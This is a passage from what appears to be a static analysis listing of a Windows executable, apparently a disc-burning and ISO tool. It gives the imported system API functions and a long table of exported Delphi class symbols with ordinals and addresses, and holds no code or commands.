SetEnhMetaFileBits, SetMapMode, SetPixel, SetPixelV, SetROP2, SetStretchBltMode, SetTextColor, SetViewportExtEx, SetViewportOrgEx, SetWinMetaFileBits, SetWindowExtEx, SetWindowOrgEx, StartDocW, StartPage, StretchBlt, StretchDIBits, UnrealizeObject
MSIMG32.DLL	AlphaBlend
SHELL32.DLL	DragAcceptFiles, DragFinish, DragQueryFileW, ExtractIconW, SHBrowseForFolderW, SHGetDesktopFolder, SHGetFileInfoW, SHGetMalloc, SHGetPathFromIDListW, SHGetSpecialFolderLocation, SHGetSpecialFolderPathW, ShellExecuteExW, ShellExecuteW
USER32.DLL	ActivateKeyboardLayout, AdjustWindowRectEx, BeginDeferWindowPos, BeginPaint, CallNextHookEx, CallWindowProcW, CharLowerBuffW, CharLowerW, CharNextW, CharUpperBuffW, CheckMenuItem, ChildWindowFromPoint, ClientToScreen, ClipCursor, CloseClipboard, CopyIcon, CopyImage, CopyRect, CountClipboardFormats, CreateAcceleratorTableW, CreateCaret, CreateIcon, CreateIconIndirect, CreateMenu, CreatePopupMenu, CreateWindowExW, DefFrameProcW, DefMDIChildProcW, DefWindowProcW, DeferWindowPos, DeleteMenu, DestroyCaret, DestroyCursor, DestroyIcon, DestroyMenu, DestroyWindow, DispatchMessageA, DispatchMessageW, DrawEdge, DrawFocusRect, DrawFrameControl, DrawIcon, DrawIconEx, DrawMenuBar, DrawTextExW, DrawTextW, EmptyClipboard, EnableMenuItem, EnableScrollBar, EnableWindow, EndDeferWindowPos, EndPaint, EnumChildWindows, EnumClipboardFormats, EnumThreadWindows, EnumWindows, EqualRect, ExitWindowsEx, FillRect, FindWindowExW, FindWindowW, FrameRect, GetActiveWindow, GetCapture, GetCaretPos, GetClassInfoW, GetClassLongW, GetClassNameW, GetClientRect, GetClipboardData, GetCursor, GetCursorPos, GetDC, GetDCEx, GetDesktopWindow, GetDlgCtrlID, GetDlgItem, GetDoubleClickTime, GetFocus, GetForegroundWindow, GetIconInfo, GetKeyNameTextW, GetKeyState, GetKeyboardLayout, GetKeyboardLayoutList, GetKeyboardLayoutNameW, GetKeyboardState, GetLastActivePopup, GetMenu, GetMenuItemCount, GetMenuItemID, GetMenuItemInfoW, GetMenuItemRect, GetMenuState, GetMenuStringW, GetMessageExtraInfo, GetMessagePos, GetMessageTime, GetParent, GetPropW, GetScrollInfo, GetScrollPos, GetScrollRange, GetSubMenu, GetSysColor, GetSysColorBrush, GetSystemMenu, GetSystemMetrics, GetTopWindow, GetWindow, GetWindowDC, GetWindowLongW, GetWindowPlacement, GetWindowRect, GetWindowTextLengthW, GetWindowTextW, GetWindowThreadProcessId, InflateRect, InsertMenuItemW, InsertMenuW, IntersectRect, InvalidateRect, IsCharAlphaNumericW, IsCharAlphaW, IsChild, IsClipboardFormatAvailable, IsDialogMessageA, IsDialogMessageW, IsIconic, IsRectEmpty, IsWindow, IsWindowEnabled, IsWindowUnicode, IsWindowVisible, IsZoomed, KillTimer, LoadBitmapW, LoadCursorW, LoadIconW, LoadImageW, LoadKeyboardLayoutW, LoadStringW, LockWindowUpdate, MapVirtualKeyW, MapWindowPoints, MessageBeep, MessageBoxA, MessageBoxW, MoveWindow, MsgWaitForMultipleObjects, MsgWaitForMultipleObjectsEx, OemToCharBuffW, OffsetRect, OpenClipboard, PeekMessageA, PeekMessageW, PostMessageW, PostQuitMessage, PtInRect, RedrawWindow, RegisterClassW, RegisterClipboardFormatW, RegisterWindowMessageW, ReleaseCapture, ReleaseDC, RemoveMenu, RemovePropW, ScreenToClient, ScrollWindow, ScrollWindowEx, SendMessageA, SendMessageW, SetActiveWindow, SetCapture, SetCaretPos, SetClassLongW, SetClipboardData, SetCursor, SetCursorPos, SetFocus, SetForegroundWindow, SetKeyboardState, SetMenu, SetMenuItemInfoW, SetParent, SetPropW, SetRect, SetScrollInfo, SetScrollPos, SetScrollRange, SetTimer, SetWindowLongW, SetWindowPlacement, SetWindowPos, SetWindowRgn, SetWindowTextW, SetWindowsHookExW, ShowOwnedPopups, ShowScrollBar, ShowWindow, SystemParametersInfoW, TrackPopupMenu, TranslateMDISysAccel, TranslateMessage, UnhookWindowsHookEx, UnregisterClassW, UpdateLayeredWindow, UpdateWindow, ValidateRect, WaitMessage, WindowFromDC, WindowFromPoint, wsprintfA, wsprintfW
WINMM.DLL	timeGetTime
OLE32.DLL	CLSIDFromString, CoCreateInstance, CoInitialize, CoTaskMemAlloc, CoTaskMemFree, CoUninitialize, IsEqualGUID, OleInitialize, OleUninitialize
OLEAUT32.DLL	GetErrorInfo, SafeArrayCreate, SafeArrayGetLBound, SafeArrayGetUBound, SafeArrayPtrOfIndex, SysAllocString, SysAllocStringLen, SysFreeString, SysReAllocStringLen, VariantChangeType, VariantClear, VariantCopy, VariantInit
SHELL32.DLL
GDIPLUS.DLL	GdiplusStartup, GdiplusShutdown, GdipReleaseDC, GdipLoadImageFromFileICM, GdipLoadImageFromFile, GdipGetImageWidth, GdipGetImageHeight, GdipFree, GdipDrawImageRectI, GdipDisposeImage, GdipDeleteGraphics, GdipCreateFromHDC, GdipCloneImage, GdipAlloc

Exports

Name	Ordinal	Address
@$xp$10TFrameList	292	0x5a0f20
@$xp$11Sconst@TAOR	1119	0x5dcd70
@$xp$11TMyCheckBox	169	0x5923d4
@$xp$11TMyIconList	312	0x5a3818
@$xp$11TMyListView	375	0x5ada7c
@$xp$11TMyTrackBar	435	0x5b0274
@$xp$12Sconst@TsRGB	1147	0x5dd7c4
@$xp$12Sedit@TsEdit	1173	0x5ded30
@$xp$12Smemo@TsMemo	1629	0x605fe0
@$xp$12TMyVolumeBar	494	0x5b2bf0
@$xp$13Sconst@TsRGBA	1148	0x5dd808
@$xp$13Slabel@TsKind	1506	0x5fe468
@$xp$13Spanel@TsGrip	1777	0x610e6c
@$xp$13TChangeButton	153	0x5919e0
@$xp$13TMyDVDListBox	267	0x59dd64
@$xp$13Zlibex@TZFree	3898	0x6bc128
@$xp$14Acpng@Acpng__1	3435	0x694d90
@$xp$14Acpng@Acpng__4	3447	0x695910
@$xp$14Sconst@PPoints	1139	0x5dd520
@$xp$14Sconst@TPoints	1140	0x5dd534
@$xp$14Sconst@TacRoot	1122	0x5dce64
@$xp$14Sconst@TsColor	1149	0x5dd858
@$xp$14Sgauge@TsGauge	1219	0x5e1ba0
@$xp$14Slabel@TsLabel	1500	0x5fddf0
@$xp$14Spanel@TsPanel	1771	0x610688
@$xp$14TMyNoticeBoard	395	0x5aed34
@$xp$14TMyProgressBar	430	0x5b000c
@$xp$14Zlibex@TZAlloc	3897	0x6bc0e4
@$xp$14Zlibex@TZError	3901	0x6bc250
@$xp$15Sconst@TPercent	1141	0x5dd560
@$xp$15Sconst@TsColor_	1150	0x5dd8f0
@$xp$15Slabel@TAlignTo	1509	0x5fe808
@$xp$15Slabel@TsShadow	1495	0x5fd1ac
@$xp$15TMyPlayProgress	416	0x5af87c
@$xp$15TMyVideoCapture	483	0x5b24e8
@$xp$16Acpng@TByteArray	3442	0x695568
@$xp$16Acpng@TChunkType	3452	0x695aec
@$xp$16Sbitbtn@TsBitBtn	613	0x5bc298
@$xp$16Sbutton@TsButton	878	0x5ce8a0
@$xp$16Sconst@PACString	1118	0x5dcd58
@$xp$16Sconst@PRGBArray	1151	0x5dd98c
@$xp$16Sconst@PacBGInfo	1135	0x5dd3c0
@$xp$16Sconst@Sconst__2	1155	0x5dda04
@$xp$16Sconst@Sconst__3	1157	0x5dda58
@$xp$16Sconst@Sconst__4	1159	0x5ddaa8
@$xp$16Sconst@TRGBArray	1152	0x5dd9a4
@$xp$16Sconst@TacBGInfo	1137	0x5dd418
@$xp$16Sconst@TacBGType	1136	0x5dd3d8
@$xp$16Slabel@TsLabelFX	1508	0x5fe76c
@$xp$16Spanel@TsColInfo	1778	0x610e90
@$xp$16Spanel@TsDragBar	1773	0x6109ac
@$xp$16Supdown@TsUpDown	2817	0x665154
@$xp$16TMyVariablePanel	451	0x5b0e1c
@$xp$17Acpng@TFloatArray	3444	0x6955c4
@$xp$17Acpng@TPNGGraphic	3455	0x695ff4
@$xp$17Sconst@PRGBAArray	1153	0x5dd9c8
@$xp$17Sconst@TCacheInfo	1138	0x5dd4b0
@$xp$17Sconst@TDateOrder	1162	0x5ddb64
@$xp$17Sconst@TRGBAArray	1154	0x5dd9e0
@$xp$17Sconst@TacImgType	1130	0x5dd018
@$xp$17Sfade@TsAnimTimer	1327	0x5e987c
@$xp$17Sfade@TsFadeTimer	1325	0x5e95ac
@$xp$17Sgraphutils@TsHSV	1350	0x5ea2d8
@$xp$17Slabel@TsKindType	1493	0x5fcfc8
@$xp$17Slabel@TsWebLabel	1504	0x5fe298
@$xp$17Supdown@TsBtnKind	2815	0x664e9c
@$xp$17TMyDropdownButton	225	0x599f7c
@$xp$17Zlibex@EZLibError	3911	0x6bcbf4
@$xp$17Zlibex@TZStrategy	3900	0x6bc1fc
@$xp$18Acpng@TColorScheme	3434	0x694d08
@$xp$18Acpng@TLZ77Decoder	3446	0x695858
@$xp$18Sconst@TDaysOfWeek	1161	0x5ddb4c
@$xp$18Sconst@TPaintEvent	1120	0x5dcd98
@$xp$18Sconst@TacAnimType	1124	0x5dceb4
@$xp$18Sconst@TacBtnEvent	1125	0x5dceec
@$xp$18Sconst@TacCtrlType	1127	0x5dcf60
@$xp$18Sconst@TacFillMode	1131	0x5dd07c
@$xp$18Sconst@TsCtrlClass	1132	0x5dd174
@$xp$18Sconst@TsHintStyle	1142	0x5dd57c
@$xp$18Sgauge@TsGaugeKind	1217	0x5e1704
@$xp$18Slabel@TsEditLabel	1502	0x5fe024
@$xp$18Smdiform@TsMDIForm	1615	0x605aa0
@$xp$18Spanel@TsContainer	1775	0x610bd8
@$xp$18Stoolbar@TsToolBar	2681	0x65e5b4
@$xp$18Zlibex@TZStreamRec	3902	0x6bc2c0
@$xp$19Acdials@TacMnuArray	2979	0x66d140
@$xp$19Acdials@TacProvider	2978	0x66d114
@$xp$19Acpng@TColorManager	3441	0x69533c
@$xp$19Acpng@TImageOptions	3448	0x695944
@$xp$19Acsbutils@TacBtnWnd	3097	0x675c14
@$xp$19Acsbutils@TacMDIWnd	3125	0x677b10
@$xp$19Acsbutils@TacMnuWnd	3121	0x677888
@$xp$19Acsbutils@TacTabWnd	3115	0x677220
@$xp$19Sconst@TacBtnEvents	1126	0x5dcf44
@$xp$19Sgradient@TRIVERTEX	1261	0x5e48e4
@$xp$19Sgradient@TsGradPie	1260	0x5e486c
@$xp$19Sgraphutils@TKernel	1357	0x5ea420
@$xp$19Slabel@TsShadowMode	1492	0x5fcf88
@$xp$20Acdials@TacDialogWnd	2976	0x66cdc4
@$xp$20Acglow@TacGlowEffect	2934	0x66988c
@$xp$20Acpng@TCardinalArray	3443	0x695594
@$xp$20Acsbutils@TacBaseWnd	3123	0x677974
@$xp$20Acsbutils@TacEditWnd	3127	0x677d80
@$xp$20Acsbutils@TacGridWnd	3133	0x6787cc
@$xp$20Acsbutils@TacIconWnd	3091	0x6753a8
@$xp$20Acsbutils@TacLinkWnd	3095	0x675754
@$xp$20Acsbutils@TacMainWnd	3087	0x675080
@$xp$20Acsbutils@TacPageWnd	3147	0x679b60
@$xp$20Acsbutils@TacSpinWnd	3105	0x6764e4
@$xp$20Salphagraph@TsCorner	657	0x5bef4c
@$xp$20Scalcunit@TsCalcForm	3531	0x6a0f78
@$xp$20Scheckbox@TsCheckBox	1454	0x5fa764
@$xp$20Scombobox@TsComboBox	912	0x5d1480
@$xp$20Scurredit@TsCalcEdit	977	0x5d6fe4
@$xp$20Sgroupbox@TsGroupBox	1282	0x5e73e4
@$xp$20Slabel@TsCustomLabel	1497	0x5fd4e0
@$xp$20Slabel@TsStickyLabel	1511	0x5fea84
@$xp$20Slistview@TsListView	1561	0x601004
@$xp$20Smaskdata@TsMaskData	1586	0x60416c
@$xp$20Smaskedit@TsMaskEdit	1597	0x604a40
@$xp$20Spanel@TsColorsPanel	1781	0x611468
@$xp$20Sspinedit@TsSpinEdit	2487	0x652f80
@$xp$20Ssplitter@TsSplitter	2594	0x656fb4
@$xp$20Stooledit@TsDateEdit	2717	0x661ed4
@$xp$20Streeview@TsTreeView	2805	0x6648cc
@$xp$21Acdials@TacSystemMenu	2974	0x66bec4
@$xp$21Acglow@TacGlowEffects	2935	0x6698b8
@$xp$21Acpng@TConvertOptions	3436	0x694df4
@$xp$21Acpng@TPNGChunkHeader	3453	0x695b10
@$xp$21Acsbutils@TacPanelWnd	3119	0x6776b8
@$xp$21Acsbutils@TacSizerWnd	3103	0x676260
@$xp$21Salphagraph@TacFast24	660	0x5bf0ec
@$xp$21Salphagraph@TacFast32	662	0x5bf320
@$xp$21Salphagraph@TsCorners	658	0x5befa8
@$xp$21Scalcunit@TsCalcState	3529	0x69f848
@$xp$21Sconst@TBmpPaintEvent	1121	0x5dce00
@$xp$21Sconst@TFadeDirection	1123	0x5dce74
@$xp$21Sconst@TGradientTypes	1144	0x5dd684
@$xp$21Sconst@TacAnimatEvent	1128	0x5dcf94
@$xp$21Sconst@TsDisabledKind	1158	0x5dda8c
@$xp$21Sdialogs@TsOpenDialog	1020	0x5d8f44
@$xp$21Sdialogs@TsPathDialog	1030	0x5d98c0
@$xp$21Sdialogs@TsSaveDialog	1024	0x5d926c
@$xp$21Sdialogs@TsZipShowing	1018	0x5d8df0
@$xp$21Sgradient@TsGradArray	1262	0x5e4960
@$xp$21Smaskdata@TsMaskArray	1589	0x60463c
@$xp$21Spagecontrol@TsTabBtn	1710	0x60a29c
@$xp$21Stooledit@TYearDigits	2712	0x661524
@$xp$21Zlibex@TCustomZStream	3904	0x6bc4e4
@$xp$22Acdials@TacBorderStyle	2972	0x66b920
@$xp$22Acpng@PImageProperties	3450	0x6959a4
@$xp$22Acpng@TCompressionType	3449	0x695960
@$xp$22Acpng@TImageProperties	3451	0x6959c0
@$xp$22Acsbutils@Acsbutils__1	3076	0x67422c
@$xp$22Acsbutils@TacBitBtnWnd	3099	0x675e20
@$xp$22Acsbutils@TacButtonWnd	3101	0x676130
@$xp$22Acsbutils@TacGridEhWnd	3135	0x6788b8
@$xp$22Acsbutils@TacScrollBar	3083	0x674628
@$xp$22Acsbutils@TacScrollWnd	3117	0x677428
@$xp$22Acsbutils@TacStaticWnd	3089	0x6751e4
@$xp$22Scomboboxes@TsColorBox	726	0x5c71b4
@$xp$22Scomboedit@TsComboEdit	947	0x5d5868
@$xp$22Sconst@TacAnimatEvents	1129	0x5dcffc
@$xp$22Sconst@TsCaptionLayout	1160	0x5ddaf4
@$xp$22Sconst@TsHackedControl	1134	0x5dd294
@$xp$22Sdefaults@Sdefaults__1	1168	0x5de720
@$xp$22Sdefaults@Sdefaults__2	1169	0x5de768
@$xp$22Sdialogs@TsColorDialog	1028	0x5d9630
@$xp$22Sgraphutils@PRGBArrays	1352	0x5ea38c
@$xp$22Sgraphutils@TRGBArrays	1353	0x5ea3a4
@$xp$22Sgroupbox@TsRadioGroup	1285	0x5e7930
@$xp$22Slabel@TsClassSkinData	1498	0x5fdc2c
@$xp$22Sscrollbox@TsScrollBox	1881	0x616ee4
@$xp$22Sskinmenus@TacMenuInfo	2115	0x62e790
@$xp$22Sspinedit@Sspinedit__5	2490	0x653428
@$xp$22Sspinedit@TsSpinButton	2483	0x652380
@$xp$22Sspinedit@TsTimePicker	2496	0x653a40
@$xp$22Sstatusbar@TsStatusBar	2607	0x657e90
@$xp$22Supdown@TsDrawingState	2814	0x664e3c
@$xp$22Svclutils@TacHideTimer	502	0x5b32d8
@$xp$22Zlibex@EZLibErrorClass	3909	0x6bcab4
@$xp$23Acpng@TConversionMethod	3438	0x694ec4
@$xp$23Acpng@TRawPaletteFormat	3437	0x694e10
@$xp$23Acpng@_TColorManager@_1	3439	0x694f30
@$xp$23Acsbutils@TDropMarkMode	3074	0x67408c
@$xp$23Acsbutils@TacToolBarWnd	3109	0x676c8c
@$xp$23Acsbutils@TacWinControl	3155	0x67a830
@$xp$23Acskinpack@TacImageItem	3882	0x6b5454
@$xp$23Scomboboxes@TsComboItem	730	0x5c7f24
@$xp$23Sconst@TsShadowingShape	1145	0x5dd6d4
@$xp$23Sconst@TsWindowShowMode	1146	0x5dd718
@$xp$23Sglyphutils@TsGlyphMode	954	0x5d6368
@$xp$23Sgraphutils@PByteArrays	1354	0x5ea3c8
@$xp$23Sgraphutils@TByteArrays	1355	0x5ea3e0
@$xp$23Sgraphutils@TFilterType	1351	0x5ea31c
@$xp$23Sgraphutils@TKernelSize	1356	0x5ea404
@$xp$23Smaskdata@TsGeneralData	1588	0x604308
@$xp$23Smaskdata@TsPatternData	1587	0x604298
@$xp$23Spagecontrol@TsTabSheet	1712	0x60a62c
@$xp$23Spanel@TsStdColorsPanel	1783	0x61179c
@$xp$23Sscrollbox@TsPaintEvent	1879	0x616928
@$xp$23Sspinedit@TTimeBtnState	2491	0x653464
@$xp$23Sstylesimply@TsSkinData	2647	0x65a4d8
@$xp$23Stooledit@TOnAcceptDate	2713	0x661568
@$xp$23Stooledit@TsFileDirEdit	2703	0x660ab4
@$xp$23Svclutils@TOutputWindow	500	0x5b2f5c
@$xp$24Acsbutils@TacCheckBoxWnd	3107	0x6768f8
@$xp$24Acsbutils@TacComboBoxWnd	3139	0x678dd8
@$xp$24Acsbutils@TacDlgPanelWnd	3093	0x675630
@$xp$24Acsbutils@TacGroupBoxWnd	3113	0x677038
@$xp$24Acsbutils@TacListViewWnd	3131	0x6784a4
@$xp$24Acsbutils@TacTreeViewWnd	3137	0x678a14
@$xp$24Acskinpack@TacImageItems	3883	0x6b54bc
@$xp$24Salphagraph@TacFastSum24	664	0x5bf608
@$xp$24Salphagraph@TacFastSum32	666	0x5bf8a4
@$xp$24Scolordialog@TColorArray	3829	0x6b1858
@$xp$24Scomboboxes@TsComboBoxEx	734	0x5c8678
@$xp$24Scomboboxes@TsComboItems	728	0x5c7cd4
@$xp$24Scommondata@TsBoundLabel	558	0x5b82bc
@$xp$24Scommondata@TsCommonData	556	0x5b7fd0
@$xp$24Sconst@TPopupWindowAlign	1163	0x5ddb9c
@$xp$24Sgradient@TsGradFillMode	1259	0x5e4828
@$xp$24Smaskdata@TsPatternArray	1590	0x604670
@$xp$24Smessages@PacSectionInfo	1639	0x606630
@$xp$24Smessages@TacSectionInfo	1638	0x6065f8
@$xp$24Spanel@_TsColorsPanel@_1	1779	0x610ef4
@$xp$24Sskinmanager@TacFormHide	1915	0x6193e0
@$xp$24Sskinmanager@TacFormShow	1913	0x619318
@$xp$24Sskinmanager@TacSkinInfo	1907	0x618fd4
@$xp$24Sskinmanager@TsSkinImage	1929	0x61a6e4
@$xp$24Sskinmenus@Sskinmenus__3	2118	0x62f1b8
@$xp$24Sskinmenus@TMenuItemData	2114	0x62e750
@$xp$24Sskinprovider@TsGripMode	2173	0x633c98
@$xp$24Sspinedit@TacTimePortion	2494	0x65373c
@$xp$24Sspinedit@TsBaseSpinEdit	2485	0x652c2c
@$xp$24Stabcontrol@TsTabControl	2660	0x65bad8
@$xp$24Stooledit@TsFilenameEdit	2709	0x660e9c
@$xp$25Acsbutils@TacComboListWnd	3129	0x677ffc
@$xp$25Acsbutils@TacStatusBarWnd	3153	0x67a6ac
@$xp$25Acthdtimer@TacTimerThread	2954	0x66b3f8
@$xp$25Scolordialog@TAccessPanel	3833	0x6b3144
@$xp$25Scomboboxes@TsCommonCombo	714	0x5c634c
@$xp$25Scurredit@TsCustomNumEdit	975	0x5d6d08
@$xp$25Sgroupbox@TsCaptionLayout	1280	0x5e6fbc
@$xp$25Sskinmanager@TacSkinTypes	1904	0x618e40
@$xp$25Sskinmanager@TsSkinImages	1933	0x61ad30
@$xp$25Sskinmanager@TsStoredSkin	1937	0x61b1e4
@$xp$25Sskinmenus@TacMenuSupport	2113	0x62e664
@$xp$25Sskinmenus@TsMenuItemType	2110	0x62e3cc
@$xp$25Sskinprovider@TsTitleIcon	2184	0x6345d8
@$xp$25Stooledit@TFileDialogKind	2707	0x660c08
@$xp$25Stooledit@TsDirectoryEdit	2711	0x661390
@$xp$25Zlibex@EZCompressionError	3913	0x6bccbc
@$xp$25Zlibex@TZCompressionLevel	3899	0x6bc15c
@$xp$26Acsbutils@THeaderPaintInfo	3075	0x6740d4
@$xp$26Acsbutils@TacTabControlWnd	3145	0x679934
@$xp$26Acsbutils@TacToolBarVCLWnd	3151	0x67a224
@$xp$26Acsbutils@TacTransPanelWnd	3111	0x676dc8
@$xp$26Acsbutils@TacWWComboBoxWnd	3143	0x67937c
@$xp$26Acshellctrls@IDetInterface	3637	0x6a4648
@$xp$26Acshellctrls@IShellDetails	3636	0x6a460c
@$xp$26Acshellctrls@TacRootFolder	3627	0x6a4240
@$xp$26Scombobox@TsCustomComboBox	910	0x5d1038
@$xp$26Sconst@TsDisabledGlyphKind	1156	0x5dda38
@$xp$26Sglyphutils@Sglyphutils__2	955	0x5d64c0
@$xp$26Slistview@TsCustomListView	1559	0x600b80
@$xp$26Spagecontrol@TsPageControl	1714	0x60ab8c
@$xp$26Spagecontrol@TsTabSkinData	1708	0x609ff8
@$xp$26Sradiobutton@TsRadioButton	1844	0x614bd0
@$xp$26Sskinmanager@TacBtnEffects	1909	0x6190bc
@$xp$26Sskinmanager@TacDialogShow	1919	0x619584
@$xp$26Sskinmanager@TacPageChange	1917	0x6194ac
@$xp$26Sskinmanager@TacSkinPlaces	1905	0x618e90
@$xp$26Sskinmanager@TsSkinGeneral	1925	0x619e18
@$xp$26Sskinmanager@TsSkinManager	1946	0x61cdb0
@$xp$26Sskinmanager@TsSkinPattern	1931	0x61ab38
@$xp$26Sskinmanager@TsStoredSkins	1939	0x61b5f0
@$xp$26Sskinmenus@TsSkinableMenus	2117	0x62f028
@$xp$26Sskinprovider@TacGraphItem	2168	0x6339c8
@$xp$26Sskinprovider@TacNCHitTest	2172	0x633c54
@$xp$26Sskinprovider@TsResizeMode	2174	0x633cdc
@$xp$26Sskinprovider@TsSystemMenu	2200	0x636cb0
@$xp$26Sspeedbutton@TsSpeedButton	2432	0x64e514
@$xp$26Stooledit@TsCustomDateEdit	2715	0x661b28
@$xp$26Zlibex@TZCompressionStream	3906	0x6bc794
@$xp$27Acsbutils@TacPageControlWnd	3149	0x679da0
@$xp$27Acshellctrls@TacShellFolder	3639	0x6a4bb8
@$xp$27Acskinpack@TacSkinConvertor	3885	0x6b5630
@$xp$27Acthdtimer@TacThreadedTimer	2956	0x66b5e4
@$xp$27Scomboboxes@TGetColorsEvent	722	0x5c6b1c
@$xp$27Scomboboxes@TsColorBoxStyle	721	0x5c6b00
@$xp$27Slistview@TsHackedListItems	1563	0x6020bc
@$xp$27Smonthcalendar@TsCalendGrid	1644	0x606bdc
@$xp$27Spagecontrol@TacCloseAction	1705	0x609e24
@$xp$27Spopupclndr@TsPopupCalendar	1824	0x614008
@$xp$27Sskinmanager@TacAnimEffects	1923	0x6198b8
@$xp$27Sskinmanager@ThirdPartyList	1941	0x61b910
@$xp$27Sskinmanager@TsSkinGenerals	1927	0x61a448
@$xp$27Sskinmanager@TsSkinPatterns	1935	0x61ae84
@$xp$27Sskinprovider@TAddItemEvent	2171	0x633bb8
@$xp$27Sskinprovider@TacAddedTitle	2178	0x633f10
@$xp$27Sskinprovider@TacBorderForm	2190	0x6362f8
@$xp$27Sskinprovider@TacGraphItems	2202	0x636d1c
@$xp$27Sskinprovider@TsTitleButton	2180	0x6341f4
@$xp$27Sspinedit@TsDecimalSpinEdit	2489	0x6532e8
@$xp$27Zlibex@EZDecompressionError	3915	0x6bcd64
@$xp$28Acpathdialog@TPathDialogForm	3818	0x6b1130
@$xp$28Acshellctrls@TacNotifyFilter	3640	0x6a4d48
@$xp$28Acshellctrls@TsShellComboBox	3657	0x6a72a0
@$xp$28Acshellctrls@TsShellListView	3661	0x6a8680
@$xp$28Acshellctrls@TsShellTreeView	3653	0x6a5f70
@$xp$28Scomboboxes@TsColorBoxStyles	720	0x5c6a54
@$xp$28Scomboboxes@TsCommonComboBox	719	0x5c68cc
@$xp$28Scomboboxes@TsCustomColorBox	724	0x5c6e90
@$xp$28Sconst@TsHintsPredefinitions	1143	0x5dd5dc
@$xp$28Scurrencyedit@TsCurrencyEdit	1212	0x5e0cc4
@$xp$28Sdefaults@TacThirdPartyTypes	1167	0x5de630
@$xp$28Sdialogs@TsOpenPictureDialog	1022	0x5d915c
@$xp$28Sdialogs@TsSavePictureDialog	1026	0x5d93e4
@$xp$28Sframeadapter@TsFrameAdapter	1269	0x5e586c
@$xp$28Smaskdata@TsGeneralDataArray	1591	0x6046a4
@$xp$28Sskinmanager@TacSkinChanging	1921	0x6196ac
@$xp$28Sskinmanager@TacSkinningRule	1942	0x61bc98
@$xp$28Sskinprovider@TacAdapterItem	2170	0x633b84
@$xp$28Sskinprovider@TacCtrlAdapter	2204	0x637264
@$xp$28Sskinprovider@TacSBAnimation	2188	0x635c00
@$xp$28Sskinprovider@TsSkinProvider	2186	0x635430
@$xp$28Sskinprovider@TsTitleButtons	2182	0x634494
@$xp$28Sspinedit@TsTimerSpeedButton	2493	0x6536dc
@$xp$28Sstylesimply@Sstylesimply__2	2649	0x65acb0
@$xp$28Zlibex@TZDecompressionStream	3908	0x6bca54
@$xp$29Acshellctrls@TacNotifyFilters	3641	0x6a4dd8
@$xp$29Acshellctrls@TacShowExtension	3634	0x6a457c
@$xp$29Scomboboxes@TsComboBoxStrings	701	0x5c56e4
@$xp$29Scustomcomboedit@TsEditButton	1067	0x5daa38
@$xp$29Smonthcalendar@TGetCellParams	1642	0x606690
@$xp$29Spagecontrol@TacCloseBtnClick	1706	0x609e64
@$xp$29Sskinmanager@TacFormAnimation	1911	0x6191fc
@$xp$29Sskinmanager@TacSkinningRules	1943	0x61bcf0
@$xp$29Sskinprovider@PsCaptionButton	2176	0x633dcc
@$xp$29Sskinprovider@TacAdapterItems	2201	0x636ce0
@$xp$29Sskinprovider@TsCaptionButton	2175	0x633d20
@$xp$29Sskinprovider@TsCustomSysMenu	2192	0x636598
@$xp$30Acalphaimagelist@TsImageFormat	3578	0x6a2128
@$xp$30Acalphaimagelist@TsImgListItem	3580	0x6a233c
@$xp$30Acsbutils@THeaderPaintElements	3077	0x67428c
@$xp$30Acshellctrls@TacAddFolderEvent	3648	0x6a54c8
@$xp$30Scolordialog@TsColorDialogForm	3831	0x6b2fb8
@$xp$30Scomboboxes@TsCustomComboBoxEx	732	0x5c840c
@$xp$30Scustomcomboedit@TCloseUpEvent	1065	0x5da6c8
@$xp$30Smonthcalendar@TsMonthCalendar	1646	0x6071f8
@$xp$30Sskinmanager@_TsSkinManager@_1	1944	0x61bd10
@$xp$30Sstylesimply@TConstantSkinData	2648	0x65a508
@$xp$30Stooledit@TExecOpenDialogEvent	2701	0x66078c
@$xp$31Acalphaimagelist@TsImgListItems	3582	0x6a24f0
@$xp$31Acsbutils@TacSpeedButtonHandler	3085	0x674bf4
@$xp$31Acsbutils@TacVirtualTreeViewWnd	3141	0x679120
@$xp$31Acshellctrls@TacShellObjectType	3632	0x6a4508
@$xp$31Acshellctrls@TsDlgShellListView	3663	0x6a9274
@$xp$31Scomboboxes@TsCustomListControl	703	0x5c5b64
@$xp$31Sgroupbox@TacIndexChangingEvent	1283	0x5e74ec
@$xp$31Sspeedbutton@TsTimerSpeedButton	2434	0x64ea7c
@$xp$32Acshellctrls@IacShellCommandVerb	3635	0x6a45c8
@$xp$32Acshellctrls@TacShellObjectTypes	3633	0x6a455c
@$xp$32Sskinmanager@TacGetExtraLineData	1906	0x618ee4
@$xp$33Acalphaimagelist@TsAlphaImageList	3584	0x6a296c
@$xp$33Acshellctrls@TacShellChangeThread	3643	0x6a5050
@$xp$34Acshellctrls@TacGetImageIndexEvent	3649	0x6a5560
@$xp$34Scustomcomboedit@TsCustomComboEdit	1069	0x5daf68
@$xp$35Acsbutils@PAdvancedHeaderPaintEvent	3080	0x67442c
@$xp$35Acsbutils@TAdvancedHeaderPaintEvent	3078	0x6742b0
@$xp$35Acshellctrls@TacCustomShellComboBox	3655	0x6a6f1c
@$xp$35Acshellctrls@TacCustomShellListView	3659	0x6a81d8
@$xp$35Acshellctrls@TacCustomShellTreeView	3651	0x6a5b94
@$xp$35Acshellctrls@TacShellChangeNotifier	3647	0x6a53e0
@$xp$35Acshellctrls@TacShellFolderProperty	3630	0x6a444c
@$xp$35Scomboboxes@TsCustomComboBoxStrings	698	0x5c5504
@$xp$37Acshellctrls@TacShellFolderCapability	3628	0x6a4398
@$xp$37Acshellctrls@TacShellFolderProperties	3631	0x6a44e0
@$xp$37Sskinmenus@TsMenuManagerDrawItemEvent	2111	0x62e424
@$xp$39Acshellctrls@TacShellFolderCapabilities	3629	0x6a4424
@$xp$40Acsbutils@PHeaderPaintQueryElementsEvent	3081	0x674454
@$xp$40Acsbutils@THeaderPaintQueryElementsEvent	3079	0x67436c
@$xp$40Scomboboxes@TsCustomComboBoxStringsClass	699	0x5c5540
@$xp$41Acshellctrls@TacCustomShellChangeNotifier	3645	0x6a5250
@$xp$8TMyClock	192	0x592fd8
@$xp$9TMyButton	120	0x59063c
@$xp$ynpqqro$v	170	0x592520
@@Aboutdialogunit@Finalize	13	0x42366c
@@Aboutdialogunit@Initialize	12	0x42365c
@@Addisomounterunit@Finalize	37	0x4301f8
@@Addisomounterunit@Initialize	36	0x4301e8
@@Baseframeunit@Finalize	39	0x43039c
@@Baseframeunit@Initialize	38	0x43038c
@@Burnfolderunit@Finalize	41	0x4303bc
@@Burnfolderunit@Initialize	40	0x4303ac
@@Burniniterror@Finalize	117	0x46635c
@@Burniniterror@Initialize	116	0x46634c
@@Burnisounit@Finalize	43	0x4303dc
@@Burnisounit@Initialize	42	0x4303cc
